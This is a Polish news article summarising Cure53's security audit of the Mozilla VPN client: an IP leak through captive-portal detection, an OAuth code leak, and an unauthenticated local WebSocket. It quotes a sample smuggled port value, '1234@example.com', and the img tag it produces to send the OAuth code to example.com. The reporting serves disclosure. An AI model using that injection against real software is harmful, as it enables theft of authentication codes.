Opublikowano wyniki audytu klienta VPN Mozilla

Firma Mozilla ogłosiła zakończenie niezależnego audytu oprogramowania klienckiego do łączenia się z usługą Mozilla VPN. W ramach audytu przeanalizowano oddzielną aplikację kliencką, stworzoną przy użyciu biblioteki Qt, dostępną dla systemów Linux, macOS, Windows, Android i iOS. Usługę Mozilla VPN obsługuje ponad 400 serwerów szwedzkiego dostawcy VPN Mullvad, zlokalizowanych w ponad 30 krajach. Połączenie z VPN-usługą odbywa się za pomocą protokołu WireGuard.

Audyt został przeprowadzony przez firmę Cure53, która wcześniej przeprowadzała audyty projektów NTPsec, SecureDrop, Cryptocat, F-Droid i Dovecot. Audyt obejmował weryfikację kodu źródłowego i przeprowadzenie testów w celu wykrycia potencjalnych luk w zabezpieczeniach (kwestie związane z kryptografią nie były rozpatrywane). W trakcie weryfikacji zidentyfikowano 16 problemów z bezpieczeństwem, z których 8 miało charakter rekomendacji, 5 zostało ocenionych jako niskie ryzyko, dwa – jako średnie, a jeden – jako wysokie.

Jednak tylko jeden problem o średnim poziomie ryzyka został zakwalifikowany jako luka w zabezpieczeniach, ponieważ tylko on nadawał się do wykorzystania. Problem ten prowadził do wycieku informacji o użyciu VPN w kodzie do określenia portalu captive z powodu wysyłania niezaszyfrowanych bezpośrednich żądań przez HTTP, które były przesyłane poza tunel VPN i ujawniały główny adres IP użytkownika w przypadku, gdy atakujący mógł kontrolować ruch tranzytowy. Problem rozwiązuje się poprzez wyłączenie trybu określania portalu captive w ustawieniach.

Druga problem o średnim poziomie zagrożenia dotyczy braku odpowiedniego czyszczenia nienumerycznych wartości w numerze portu, co pozwala na przeprowadzenie wycieku parametrów uwierzytelniania OAuth przez podmianę numeru portu na ciąg w postaci „1234@example.com”, co prowadzi do ustawienia tagu <img src="»http://127.0.0.1:1234@example.com/?code=…»" alt="»»">, który odwołuje się do example.com zamiast 127.0.0.1.

Trzeci problem, oznaczony jako niebezpieczny, umożliwia każdej lokalnej aplikacji bez autoryzacji dostęp do klienta VPN przez WebSocket powiązany z localhost. Jako przykład pokazano, jak przy aktywnym kliencie VPN każda strona mogła zorganizować tworzenie i wysyłanie zrzutu ekranu poprzez generację zdarzenia screen_capture. Problem nie został sklasyfikowany jako luka w zabezpieczeniach, ponieważ WebSocket był używany tylko w wewnętrznych testowych wersjach i zastosowanie tego kanału komunikacyjnego planowano jedynie na przyszłość w celu organizacji interakcji z dodatkiem przeglądarki.

Źródło: opennet.ru

Kup solidny hosting stron z ochroną przed DDoS, serwery VPS VDS 🔥 Kup solidny hosting stron z ochroną przed DDoS, serwery VPS VDS | ProHoster